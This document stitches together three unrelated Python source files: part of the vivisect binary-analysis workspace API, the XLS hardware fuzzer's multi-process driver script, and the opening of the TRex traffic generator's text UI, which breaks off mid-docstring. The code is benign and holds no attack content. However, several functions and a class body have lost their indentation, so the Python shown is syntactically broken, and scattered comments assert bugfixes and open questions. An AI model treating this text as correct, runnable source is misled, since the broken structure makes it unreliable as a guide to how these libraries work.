    found (giving up at va 0).
    """
    ret = self.locmap.getMapLookup(va - 1)
    if ret is not None or adjacent:
        return ret

    cur = va - 2
    while cur > 0:
        ret = self.locmap.getMapLookup(cur)
        if ret is not None:
            return ret
        cur -= 1
    return None
def vaByName(self, name):
    '''Return the va bound to the given name, or None if unknown.'''
    return self.va_by_name.get(name)
def getLocationByName(self, name):
    """
    Return a location tuple by the name of the location.
    Raises InvalidLocation for an unknown name.
    """
    va = self.vaByName(name)
    if va is None:
        raise InvalidLocation(0, "Unknown Name: %s" % name)
    return self.getLocation(va)
def getNames(self):
    """
    Return a list of (va, name) tuples for all named vas.
    """
    return [(va, name) for va, name in self.name_by_va.items()]
def getName(self, va, smart=False):
    '''
    Returns the name of the specified virtual address (or None).

    Smart mode digs beyond simple name lookups, as follows:
    If va falls within a known function in the workspace, we return "funcname+<delta>".
    If not, and the va falls within a mapped binary, we return "filename+<delta>"
    '''
    name = self.name_by_va.get(va)
    if name is not None or not smart:
        return name
    # TODO: by previous symbol?
    # by function
    baseva = self.getFunction(va)
    basename = self.name_by_va.get(baseva, None)
    if self.isFunction(va):
        # va is itself an (unnamed) function entry; synthesize a sub_ name
        basename = 'sub_0%x' % va
    # by filename
    if basename is None:
        basename = self.getFileByVa(va)
        if basename is None:
            return None
        baseva = self.getFileMeta(basename, 'imagebase')
    delta = va - baseva
    if delta:
        # '+' only for positive deltas; hex() of a negative already has '-'
        pom = ('', '+')[delta>0]
        name = "%s%s%s" % (basename, pom, hex(delta))
    else:
        name = basename
    return name
def makeName(self, va, name, filelocal=False, makeuniq=False):
    """
    Set a readable name for the given location by va. There
    *must* be a Location defined for the VA before you may name
    it. You may set a location's name to None to remove a name.

    makeuniq allows Vivisect to append some number to make the name unique.
    This behavior allows for colliding names (eg. different versions of a function)
    to coexist in the same workspace.
    default behavior is to fail on duplicate (False).
    """
    if filelocal:
        segtup = self.getSegment(va)
        if segtup is None:
            self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name))
        if segtup is not None:
            fname = segtup[SEG_FNAME]
            if fname is not None:
                # prefix the name with its owning file: "<file>.<name>"
                name = "%s.%s" % (fname, name)
    oldva = self.vaByName(name)
    # If that's already the name, ignore the event
    if oldva == va:
        return
    if oldva is not None:
        if not makeuniq:
            raise DuplicateName(oldva, va, name)
        else:
            logger.debug('makeName: %r already lives at 0x%x', name, oldva)
            # tack a number on the end
            index = 0
            newname = "%s_%d" % (name, index)
            newoldva = self.vaByName(newname)
            # NOTE(review): 'not in (None, newname)' compares a va against a
            # string, so this effectively just tests "is not None" — confirm intent
            while self.vaByName(newname) not in (None, newname):
                # if we run into the va we're naming, that's the name still
                if newoldva == va:
                    return newname
                logger.debug('makeName: %r already lives at 0x%x', newname, newoldva)
                index += 1
                newname = "%s_%d" % (name, index)
                newoldva = self.vaByName(newname)
            name = newname
    self._fireEvent(VWE_SETNAME, (va,name))
    return name
def saveWorkspace(self, fullsave=True):
    '''
    Persist the workspace using the configured storage module.
    fullsave=False writes only the changes since the last save mark.
    Remote (server-backed) workspaces are saved server-side, so this
    is a no-op for them.
    '''
    if self.server is not None:
        return

    modname = self.getMeta("StorageModule")
    storename = self.getMeta("StorageName")
    if modname is None:
        raise Exception("StorageModule not specified!")
    if storename is None:
        raise Exception("StorageName not specified!")

    # Usually this is "vivisect.storage.basicfile
    stormod = self.loadModule(modname)

    # A full save rewrites everything; otherwise only append changes.
    if fullsave:
        stormod.saveWorkspace(self, storename)
    else:
        stormod.saveWorkspaceChanges(self, storename)

    self._createSaveMark()
def loadFromFd(self, fd, fmtname=None, baseaddr=None):
    """
    Read the first bytes of the file descriptor and see if we can identify the type.
    If so, load up the parser for that file type, otherwise raise an exception.

    Returns the file basename assigned by the parser (the md5 hexdigest
    of the file contents is used as the storage name).
    """
    fd.seek(0)
    if fmtname is None:
        # sniff the format from the first 32 bytes — fix: don't shadow
        # the builtin 'bytes'
        byts = fd.read(32)
        fmtname = viv_parsers.guessFormat(byts)

    mod = viv_parsers.getParserModule(fmtname)
    if hasattr(mod, "config"):
        self.mergeConfig(mod.config)

    # hash the whole file to produce a stable storage name
    fd.seek(0)
    filemd5 = hashlib.md5(fd.read()).hexdigest()
    fname = mod.parseFd(self, fd, filemd5, baseaddr=baseaddr)

    self.initMeta("StorageName", filemd5+".viv")

    # Snapin our analysis modules
    self._snapInAnalysisModules()

    return fname
def loadParsedBin(self, pbin, fmtname=None, baseaddr=None):
    '''
    Load an already parsed PE or Elf file into the workspace. Raises an exception if
    the file isn't one of those two.

    Returns the md5 hexdigest of the file contents (also used as the
    storage name).
    '''
    fd = pbin.fd
    fd.seek(0)
    if fmtname is None:
        byts = fd.read(32)
        fmtname = viv_parsers.guessFormat(byts)

    # bugfix: rewind before hashing so the digest always covers the whole
    # file (previously the first 32 bytes were skipped when sniffing)
    fd.seek(0)
    filemd5 = hashlib.md5(fd.read()).hexdigest()

    mod = viv_parsers.getParserModule(fmtname)
    if hasattr(mod, "config"):
        self.mergeConfig(mod.config)

    if fmtname == 'pe':
        mod.loadPeIntoWorkspace(self, pbin)
    elif fmtname == 'elf':
        mod.loadElfIntoWorkspace(self, pbin)
    else:
        # bugfix: the message was passed printf-style args that Exception
        # does not format
        raise Exception('Failed to load in the parsed module for format %s' % fmtname)

    self.initMeta("StorageName", filemd5+".viv")
    self._snapInAnalysisModules()
    # bugfix: previously returned an undefined name 'fname' (NameError)
    return filemd5
def _saveSymbolCaches(self):
    # Push workspace names out to the vdb symbol cache (no-op if disabled).
    if not self.config.vdb.SymbolCacheActive:
        return
    pathstr = self.config.vdb.SymbolCachePath
    symcache = e_symcache.SymbolCachePath(pathstr)
    # file name -> list of (base-relative va, size, name, symtype)
    symsbyfile = collections.defaultdict(list)
    # Get the image base addresses
    imgbases = {}
    for fname in self.getFiles():
        imgbases[ fname ] = self.getFileMeta(fname,'imagebase')
    for va,name in self.name_by_va.items():
        mmap = self.getMemoryMap(va)
        if mmap is None:
            continue
        # mmap[3] is the map's file name; store addresses base-relative
        symva = va - imgbases.get(mmap[3], va)
        if symva:
            symtype = e_resolv.SYMSTOR_SYM_SYMBOL
            if self.isFunction(va):
                symtype = e_resolv.SYMSTOR_SYM_FUNCTION
            symsbyfile[mmap[3]].append((symva, 0, name, symtype))
    for filenorm, symtups in symsbyfile.items():
        # only files with a known cache hash can be saved
        symhash = self.getFileMeta(filenorm, 'SymbolCacheHash')
        if symhash is None:
            continue
        self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups)))
        symcache.setCacheSyms( symhash, symtups )
def loadFromFile(self, filename, fmtname=None, baseaddr=None):
    """
    Read the first bytes of the file and see if we can identify the type.
    If so, load up the parser for that file type, otherwise raise an exception.

    ( if it's a workspace, trigger loadWorkspace() as a convenience )

    Returns the basename the file was given on load.
    """
    if fmtname is None:
        fmtname = viv_parsers.guessFormatFilename(filename)

    # workspace formats short-circuit into loadWorkspace()
    storemod = STORAGE_MAP.get(fmtname)
    if storemod is not None:
        self.setMeta('StorageModule', storemod)
        self.loadWorkspace(filename)
        return self.normFileName(filename)

    parser = viv_parsers.getParserModule(fmtname)
    fname = parser.parseFile(self, filename, baseaddr=baseaddr)

    self.initMeta("StorageName", filename + ".viv")

    # Snapin our analysis modules
    self._snapInAnalysisModules()
    return fname
def loadFromMemory(self, memobj, baseaddr, fmtname=None):
    """
    Load a memory map (or potentially a mapped binary file)
    from the memory object's map at baseaddr.
    """
    if fmtname is None:
        # sniff the format from the first bytes of the map
        fmtname = viv_parsers.guessFormat(memobj.readMemory(baseaddr, 32))

    # TODO: Load workspace from memory?
    parser = viv_parsers.getParserModule(fmtname)
    parser.parseMemory(self, memobj, baseaddr)

    mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr)
    if not mapfname:
        mapfname = 'mem_map_%.8x' % mapva
    self.initMeta('StorageName', mapfname + ".viv")

    # Snapin our analysis modules
    self._snapInAnalysisModules()
def getFiles(self):
    """
    Return the names of the files currently loaded in this workspace.
    """
    return [fname for fname in self.filemeta]
def normFileName(self, filename):
    '''
    Normalize a file path into a workspace-safe base name: lower-cased
    basename, extension (text after the final dot) stripped, and any
    character outside [A-Za-z0-9_] replaced by '_'.
    '''
    normname = os.path.basename(filename).lower()

    # Strip off an extension, joining any remaining dots with '_'
    if '.' in normname:
        normname = '_'.join(normname.split('.')[:-1])

    # idiom: single-pass comprehension instead of mutating a char list
    ok = string.ascii_letters + string.digits + '_'
    return ''.join(c if c in ok else '_' for c in normname)
def addFile(self, filename, imagebase, md5sum):
    """
    Create and add a new vivisect File object for the
    specified information. This will return the file
    object which you may then use to do things like
    add imports/exports/segments etc...
    """
    nname = self.normFileName(filename)
    if nname in self.filemeta:
        raise Exception("Duplicate File Name: %s" % nname)

    self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum))
    return nname
def addEntryPoint(self, va):
    '''
    Add an entry point to the definition for the given file. This
    will hint the analysis system to create functions when analysis
    is run.

    NOTE: No analysis is triggered by this function.
    '''
    self.setVaSetRow('EntryPoints', (va,))
def getEntryPoints(self):
    '''
    Get all the parsed entry points for all the files loaded into the
    workspace.

    Example: for va in vw.getEntryPoints():
    '''
    entries = []
    for row in self.getVaSetRows('EntryPoints'):
        va, = row
        entries.append(va)
    return entries
def setFileMeta(self, fname, key, value):
    """
    Store a piece of file specific metadata (python primatives are best for values)
    """
    if fname not in self.filemeta:
        raise Exception("Invalid File: %s" % fname)
    self._fireEvent(VWE_SETFILEMETA, (fname, key, value))
def getFileMeta(self, filename, key, default=None):
    """
    Retrieve a piece of file specific metadata
    (raises for an unknown file).
    """
    fdict = self.filemeta.get(filename)
    if fdict is None:
        raise Exception("Invalid File: %s" % filename)
    return fdict.get(key, default)
def getFileMetaDict(self, filename):
    '''
    Retrieve the file metadata for this file as a key:val dict
    (raises for an unknown file).
    '''
    fdict = self.filemeta.get(filename)
    if fdict is None:
        raise Exception('Invalid File: %s' % filename)
    return fdict
def getFileByVa(self, va):
    '''
    Return the normalized file name owning the segment containing va,
    or None when va is not in any known segment.
    '''
    segtup = self.getSegment(va)
    return None if segtup is None else segtup[SEG_FNAME]
def getLocationDistribution(self):
    # NOTE: if this changes, don't forget the report module!
    # Returns {ltype: (typename, count, total_bytes, pct_of_mapped)}.
    totsize = 0
    for mapva, mapsize, mperm, mname in self.getMemoryMaps():
        totsize += mapsize
    loctot = 0
    ret = {}
    for i in range(LOC_MAX):
        cnt = 0
        size = 0
        for lva,lsize,ltype,tinfo in self.getLocations(i):
            cnt += 1
            size += lsize
        loctot += size
        tname = loc_type_names.get(i, 'Unknown')
        ret[i] = (tname, cnt, size, int((size/float(totsize))*100))
    # Update the undefined based on totals...
    undeftot = totsize-loctot
    ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100))
    return ret
#################################################################
#
# VA Set API
#
def getVaSetNames(self):
    """
    Get a list of the names of the current VA sets.
    """
    return [name for name in self.vasets]
def getVaSetDef(self, name):
    """
    Get the list of (name, type) pairs which make up the
    rows for this given VA set (the first one *always* the VA, but
    you can name it as you like...)
    """
    setdef = self.vasetdefs.get(name)
    if setdef is None:
        raise InvalidVaSet(name)
    return setdef
def getVaSetRows(self, name):
    """
    Get a list of the rows in this VA set.
    """
    vaset = self.vasets.get(name)
    if vaset is None:
        raise InvalidVaSet(name)
    # yes, this is weird. but it's how python2 returns values()
    return list(vaset.values())
def getVaSet(self, name):
    """
    Get the dictionary of va:<rowdata> entries for the named set.
    """
    vaset = self.vasets.get(name)
    if vaset is None:
        raise InvalidVaSet(name)
    return vaset
def addVaSet(self, name, defs, rows=()):
    """
    Add a va set:
        name - The name for this VA set
        defs - List of (<name>,<type>) tuples for the rows (va is always first)
        rows - An initial set of rows for values in this set.
    """
    self._fireEvent(VWE_ADDVASET, (name, defs, rows))
def delVaSet(self, name):
    """
    Delete a VA set by name (raises for an unknown set).
    """
    if name not in self.vasets:
        raise Exception("Unknown VA Set: %s" % name)
    self._fireEvent(VWE_DELVASET, name)
def setVaSetRow(self, name, rowtup):
    """
    Use this API to update the row data for a particular
    entry in the VA set.
    """
    self._fireEvent(VWE_SETVASETROW, (name, rowtup))
def getVaSetRow(self, name, va):
    '''
    Retrieve the va set row for va in the va set named name
    (None when the set or row is unknown).

    Example:
        row = vw.getVaSetRow('WootFunctions', fva)
    '''
    vaset = self.vasets.get(name)
    if vaset is None:
        return None
    return vaset.get(va)
def delVaSetRow(self, name, va):
    """
    Use this API to delete the rowdata associated
    with the specified VA from the set.
    """
    if name not in self.vasets:
        raise Exception("Unknown VA Set: %s" % name)
    self._fireEvent(VWE_DELVASETROW, (name, va))
#################################################################
#
# Shared Workspace APIs
#
def chat(self, msg):
    '''
    Send a chat message (tagged with the local username) to other
    users of a shared workspace.
    '''
    # FIXME this should be part of a UI event model.
    self._fireEvent(VWE_CHAT, (e_config.getusername(), msg))
def iAmLeader(self, winname):
    '''
    Announce that your workspace is leading a window with the
    specified name. This allows others to opt-in to following
    the nav events for the given window name.

    Example:
        vw.iAmLeader('WindowTitle')
    '''
    if not self.server:
        raise Exception('iAmLeader() requires being connected to a server.')

    user = e_config.getusername()
    self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user, winname))
def followTheLeader(self, winname, expr):
    '''
    Announce a new memory expression to navigate to, for any window
    following the specified user/winname.

    Example:
        vw.followTheLeader('FunExample', 'sub_08042323')
    '''
    if not self.server:
        raise Exception('followTheLeader() requires being connected to a server.')

    user = e_config.getusername()
    self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user, winname, expr))
#################################################################
#
# Color Map API
#
def getColorMaps(self):
    """
    Return a list of the names of the registered color maps.
    """
    return [name for name in self.colormaps]
def addColorMap(self, mapname, colormap):
    """
    Add a colormap dictionary with the given name for the map.
    (A colormap dictionary is va:color entries)
    """
    self._fireEvent(VWE_ADDCOLOR, (mapname, colormap))
def delColorMap(self, mapname):
    """Remove the named colormap via the event stream."""
    self._fireEvent(VWE_DELCOLOR, mapname)
def getColorMap(self, mapname):
    """
    Return the colormap dictionary for the given map name
    (or None if unknown).
    """
    return self.colormaps.get(mapname)
def _getNameParts(self, name, va):
'''
Return the given name in three parts:
fpart: filename, if applicable (for file-local names)
npart: base name
vapart: address, if tacked on the end
If any of these are not applicable, they will return None for that field.
'''
fpart = None
npart = name
vapart = None
fname = self.getFileByVa(va)
vastr = '_%.8x' % va
if name.startswith(fname + '.'):
fpart, npart = name.split('.', 1)
elif name.startswith('*.'):
skip, npart = name.split('.', 1)
if npart.endswith(vastr) and not npart == 'sub' + vastr:
npart, vapart = npart.rsplit('_', 1)
return fpart, npart, vapart
def _addNamePrefix(self, name, va, prefix, joinstr=''):
'''
Add a prefix to the given name paying attention to the filename prefix, and
any VA suffix which may exist.
'''
fpart, npart, vapart = self._getNameParts(name, va)
if fpart is None and vapart is None:
name = joinstr.join([prefix, npart])
elif vapart is None:
name = fpart + '.' + joinstr.join([prefix, npart])
elif fpart is None:
name = joinstr.join([prefix, npart])
else:
name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart
return name
##########################################################
#
# The envi.symstore.resolver.SymbolResolver API...
#
def getSymByName(self, name):
    """
    SymbolResolver API: resolve a name to a Symbol, or to a file
    symbol namespace for subsequent dotted lookups.
    """
    va = self.vaByName(name)
    if va is not None:
        return e_resolv.Symbol(name, va, 0)

    # the name may be a mapped file; return a deref-able namespace
    fmeta = self.filemeta.get(name)
    if fmeta is not None:
        return VivFileSymbol(self, name, fmeta.get("imagebase"), 0, self.psize)
def getSymByAddr(self, addr, exact=True):
    """
    SymbolResolver API: return a Symbol for addr, synthesizing a
    "loc_XXXXXXXX" name for unnamed but valid pointers.
    """
    name = self.getName(addr)
    if name is None and self.isValidPointer(addr):
        name = "loc_%.8x" % addr

    if name is None:
        return None

    #FIXME fname
    #FIXME functions/segments/etc...
    return e_resolv.Symbol(name, addr, 0)
def setSymHint(self, va, idx, hint):
    '''
    Set a symbol hint which will be used in place of operand
    values during disassembly among other things...

    You may also set hint=None to delete sym hints.
    '''
    self._fireEvent(VWE_SYMHINT, (va, idx, hint))
def getSymHint(self, va, idx):
    """
    Return the symbol hint for operand idx at va (or None).
    A function-local name (frame reference) takes precedence over
    an explicitly set hint.
    """
    fref = self.getFref(va, idx)
    if fref is not None:
        func = self.getFunction(va)
        local = self.getFunctionLocal(func, fref)
        if local:
            return local[1]
    return self.symhints.get((va, idx))
class VivFileSymbol(e_resolv.FileSymbol):
    '''
    A FileSymbol subclass which resolves dotted sub-symbol lookups
    ("<file>.<name>") back through the owning vivisect workspace.
    '''

    def __init__(self, vw, fname, base, size, width=4):
        self.vw = vw
        e_resolv.FileSymbol.__init__(self, fname, base, size, width)

    def getSymByName(self, name):
        # delegate the namespaced lookup to the workspace resolver
        return self.vw.getSymByName("%s.%s" % (self.name, name))
def getVivPath(*pathents):
    """
    Return an absolute path rooted at the directory containing this
    module, joined with any given path elements.
    """
    base = os.path.abspath(os.path.dirname(__file__))
    return os.path.join(base, *pathents)
##############################################################################
# The following are touched during the release process by bump2version.
# You should have no reason to modify these directly
version = (1, 0, 3)  # (major, minor, patch)
verstring = '.'.join([str(x) for x in version])  # e.g. "1.0.3"
commit = ''  # presumably filled in by release tooling — verify
|
run_fuzz_multiprocess_main.py | # Lint as: python3
#
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multi-process fuzz driver program.
Collects crash samples into a directory of the user's choosing.
"""
import datetime
import multiprocessing as mp
import os
import random
import sys
from absl import app
from absl import flags
import psutil
from xls.common import gfile
from xls.common import multiprocess
from xls.fuzzer import cli_helpers
from xls.fuzzer import run_fuzz_multiprocess
from xls.fuzzer.python import cpp_ast_generator as ast_generator
from xls.fuzzer.python import cpp_sample as sample
# --- sample generation controls ---
flags.DEFINE_integer('seed', 0, 'Seed value for generation')
flags.DEFINE_integer('sample_count', 1024, 'Number of samples to generate')
flags.DEFINE_string('duration', None,
                    'Duration to run the sample generator for')
flags.DEFINE_integer('calls_per_sample', 128,
                     'Arguments to generate per sample')
# --- output paths ---
flags.DEFINE_string('crash_path', None, 'Path at which to place crash data')
flags.DEFINE_string(
    'save_temps_path', None, 'Path of directory in which to save temporary '
    'files. These temporary files include DSLX, IR, and arguments. A '
    'separate numerically-named subdirectory is created for each sample')
flags.DEFINE_integer(
    'worker_count', None, 'Number of workers to use for execution; defaults '
    'to number of physical cores detected')
flags.DEFINE_boolean('disallow_divide', True,
                     'Exclude generation of divide operator')
flags.DEFINE_boolean('emit_loops', True, 'Emit loops in generator')
flags.DEFINE_boolean(
    'use_llvm_jit', True, 'Use LLVM JIT to evaluate IR. The interpreter is '
    'still invoked at least once on the IR even with this option enabled, but '
    'this option can be used to disable the JIT entirely.')
flags.DEFINE_boolean('codegen', False, 'Run code generation')
flags.DEFINE_boolean('simulate', False, 'Run Verilog simulation.')
flags.DEFINE_string('simulator', None,
                    'Verilog simulator to use. For example: "iverilog".')
flags.DEFINE_boolean('execute', True, 'Execute IR (vs simply code generation)')
flags.DEFINE_boolean(
    'minimize_ir', True,
    'If a crasher is found, attempt to reduce the IR to find a minimal '
    'reproducer.')
flags.DEFINE_boolean('print_samples', False,
                     'Print generated samples (to stdout)')
flags.DEFINE_boolean(
    'short_samples', False,
    'Generate samples with small number of nested expressions')
flags.DEFINE_string(
    'summary_path', None,
    'Directory in which to write the sample summary information. This records '
    'information about each generated sample including which XLS op types and '
    'widths. Information is written in Protobuf format with one file per '
    'worker. Files are appended to by the worker.')
flags.DEFINE_integer(
    'max_width_bits_types', 64,
    'The maximum width of bits types in the generated samples.')
flags.DEFINE_integer(
    'max_width_aggregate_types', 1024,
    'The maximum width of aggregate types (tuples and arrays) in the generated '
    'samples.')
flags.DEFINE_boolean(
    'use_system_verilog', True,
    'If true, emit SystemVerilog during codegen otherwise emit Verilog.')
flags.DEFINE_integer(
    'timeout_seconds', 300,
    'The timeout value in seconds for each subcommand invocation.')

FLAGS = flags.FLAGS

# Max pending samples per worker queue before the generator blocks.
QUEUE_MAX_BACKLOG = 16
def main(argv):
  """Generates fuzz samples and dispatches them to a pool of worker processes."""
  if len(argv) > 1:
    raise app.UsageError('Too many command-line arguments.')

  if FLAGS.simulate and not FLAGS.codegen:
    raise app.UsageError('Must specify --codegen when --simulate is given.')

  # Test that we can write to the crash and summary path.
  for path in (FLAGS.crash_path, FLAGS.summary_path):
    if path:
      gfile.make_dirs(path)
      with gfile.open(os.path.join(path, 'test'), 'w') as f:
        print('test', file=f)

  start = datetime.datetime.now()

  physical_core_count = psutil.cpu_count(logical=False)
  worker_count = FLAGS.worker_count or physical_core_count
  worker_count = max(worker_count, 1)  # Need at least one worker.

  # Reuse queues pre-created in real_main() when the multiprocess backend
  # supports user data; otherwise create one queue per worker here.
  queues = (multiprocess.get_user_data() or
            [mp.Queue() for _ in range(worker_count)])
  queues = queues[:worker_count]

  print('-- Creating pool of {} workers; physical core count {}'.format(
      worker_count, physical_core_count))

  # Start one consumer process per worker.
  workers = []
  for i in range(worker_count):
    queue = None if multiprocess.has_user_data_support() else queues[i]
    target = run_fuzz_multiprocess.do_worker_task
    args = (i, queue, FLAGS.crash_path, FLAGS.summary_path,
            FLAGS.save_temps_path, FLAGS.minimize_ir)
    worker = multiprocess.Process(target=target, args=args)
    worker.start()
    workers.append(worker)

  duration_str = FLAGS.duration
  duration = None if duration_str is None else cli_helpers.parse_duration(
      duration_str)

  # Seed 0 (the default) means "pick a random seed".
  seed = FLAGS.seed
  if not seed:
    seed = random.randrange(0, 1 << 31)
    print('-- Using randomly generated seed:', seed)
    sys.stdout.flush()

  generator_options = ast_generator.AstGeneratorOptions(
      disallow_divide=FLAGS.disallow_divide,
      emit_loops=FLAGS.emit_loops,
      short_samples=FLAGS.short_samples,
      max_width_bits_types=FLAGS.max_width_bits_types,
      max_width_aggregate_types=FLAGS.max_width_aggregate_types,
      emit_gate=not FLAGS.codegen)
  default_sample_options = sample.SampleOptions(
      convert_to_ir=True,
      optimize_ir=True,
      use_jit=FLAGS.use_llvm_jit,
      codegen=FLAGS.codegen,
      simulate=FLAGS.simulate,
      simulator=FLAGS.simulator,
      use_system_verilog=FLAGS.use_system_verilog,
      timeout_seconds=FLAGS.timeout_seconds)

  # Produce samples until sample_count (or the duration) is reached.
  sample_count = run_fuzz_multiprocess.do_generator_task(
      queues,
      seed,
      generator_options,
      FLAGS.sample_count,
      FLAGS.calls_per_sample,
      default_sample_options=default_sample_options,
      duration=duration,
      print_samples=FLAGS.print_samples)

  for i, worker in enumerate(workers):
    print('-- Joining on worker {}'.format(i))
    worker.join()

  delta = datetime.datetime.now() - start
  elapsed = delta.total_seconds()
  print(
      '-- Elapsed end-to-end: {} = {:.2f} seconds; {:,} samples; {:.2f} samples/s'
      .format(delta, elapsed, sample_count, sample_count / elapsed))
if __name__ == '__main__':

  def real_main():  # Avoid defining things in global scope.
    flags.mark_flag_as_required('crash_path')
    # Queues must exist before run_main spawns subprocesses; 128 is the
    # upper bound on workers supported this way — confirm against backend.
    queues = tuple(mp.Queue(QUEUE_MAX_BACKLOG) for _ in range(128))
    multiprocess.run_main(main, queues)

  real_main()
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
    """Raised internally to signal that the TUI main loop should exit."""
    pass
def ascii_split (s):
    '''
    Split s into lines, dropping any line whose visible length
    (ANSI-escape aware, via ansi_len) is zero.
    '''
    # idiom: comprehension instead of a manual append loop
    return [line for line in s.split('\n') if ansi_len(line) > 0]
class SimpleBar(object):
    '''
    A minimal spinner-style indicator which cycles through the
    characters of a pattern, advancing one step per show() call.
    '''

    def __init__ (self, desc, pattern):
        self.desc = desc
        self.pattern = pattern
        self.pattern_len = len(pattern)
        self.index = 0

    def show (self, buffer):
        # render "<desc> <glyph>" (or just the glyph), bolded
        glyph = self.pattern[self.index]
        if self.desc:
            text = "{0} {1}".format(self.desc, glyph)
        else:
            text = "{0}".format(glyph)
        print(format_text(text, 'bold'), file = buffer)

        self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
    '''
    Abstract base type for a TUI panel. Subclasses must implement
    show() (render into a buffer) and get_key_actions() (keyboard
    dispatch table).
    '''

    def __init__ (self, mng, name):
        self.mng = mng
        self.name = name
        self.client = mng.client
        self.is_graph = False

    def show (self, buffer):
        raise NotImplementedError("must implement this")

    def get_key_actions (self):
        raise NotImplementedError("must implement this")

    def get_name (self):
        return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
FILTER_ACQUIRED = 1
FILTER_ALL = 2
def __init__ (self, mng):
    super(TrexTUIDashBoard, self).__init__(mng, "dashboard")

    self.ports = self.client.get_all_ports()

    # keyboard dispatch table: key -> {action, legend, show[, color]}
    self.key_actions = OrderedDict()

    self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
    self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
    self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
    self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
    self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
    self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}

    # register all the ports to the toggle action
    for port_id in self.ports:
        self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}

    # controls which ports are visible in the dashboard
    self.toggle_filter = ToggleFilter(self.ports)

    # default view: owned ports if any are acquired, otherwise all
    if self.client.get_acquired_ports():
        self.action_show_owned()
    else:
        self.action_show_all()
def get_showed_ports (self):
return self.toggle_filter.filter_items()
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.get_showed_ports():
self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)
def get_key_actions (self):
allowed = OrderedDict()
allowed['n'] = self.key_actions['n']
allowed['o'] = self.key_actions['o']
allowed['a'] = self.key_actions['a']
for i in self.ports:
allowed[str(i)] = self.key_actions[str(i)]
if self.get_showed_ports():
allowed['c'] = self.key_actions['c']
# if not all ports are acquired - no operations
if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
return allowed
if self.client.get_mode() == 'STL':
# if any/some ports can be resumed
if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
allowed['r'] = self.key_actions['r']
# if any/some ports are transmitting - support those actions
if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
allowed['p'] = self.key_actions['p']
return allowed
######### actions
def action_pause (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
try:
rc = self.client.pause(ports = ports)
except TRexError:
pass
return ""
def action_resume (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
try:
self.client.resume(ports = ports)
except TRexError:
pass
return ""
def action_reset_view (self):
self.toggle_filter.reset()
return ""
def action_show_owned (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
return ""
def action_show_all (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_all_ports())
return ""
def action_clear (self):
self.client.clear_stats(self.toggle_filter.filter_items())
return "cleared all stats"
def action_toggle_port(self, port_id):
def action_toggle_port_x():
self.toggle_filter.toggle_item(port_id)
return ""
return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
    """Panel showing global stats together with per-stream statistics."""

    def __init__(self, mng):
        super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
        actions = OrderedDict()
        actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
        self.key_actions = actions

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        self.client._show_streams_stats(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_clear(self):
        """Reset the packet-group statistics counters."""
        self.client.pgid_stats.clear_stats()
        return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
    """Panel toggling between the latency table and a latency histogram."""

    def __init__(self, mng):
        super(TrexTUILatencyStats, self).__init__(mng, "lstats")
        self.key_actions = OrderedDict()
        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
        self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
        self.is_histogram = False   # False -> plain latency stats view

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        # pick the body renderer according to the current toggle
        render = (self.client._show_latency_histogram if self.is_histogram
                  else self.client._show_latency_stats)
        render(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_toggle_histogram(self):
        """Flip between the histogram view and the plain stats view."""
        self.is_histogram = not self.is_histogram
        return ""

    def action_clear(self):
        """Reset the packet-group statistics counters."""
        self.client.pgid_stats.clear_stats()
        return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
    """ASTF traffic-stats panel with vertical scrolling and per-template-group
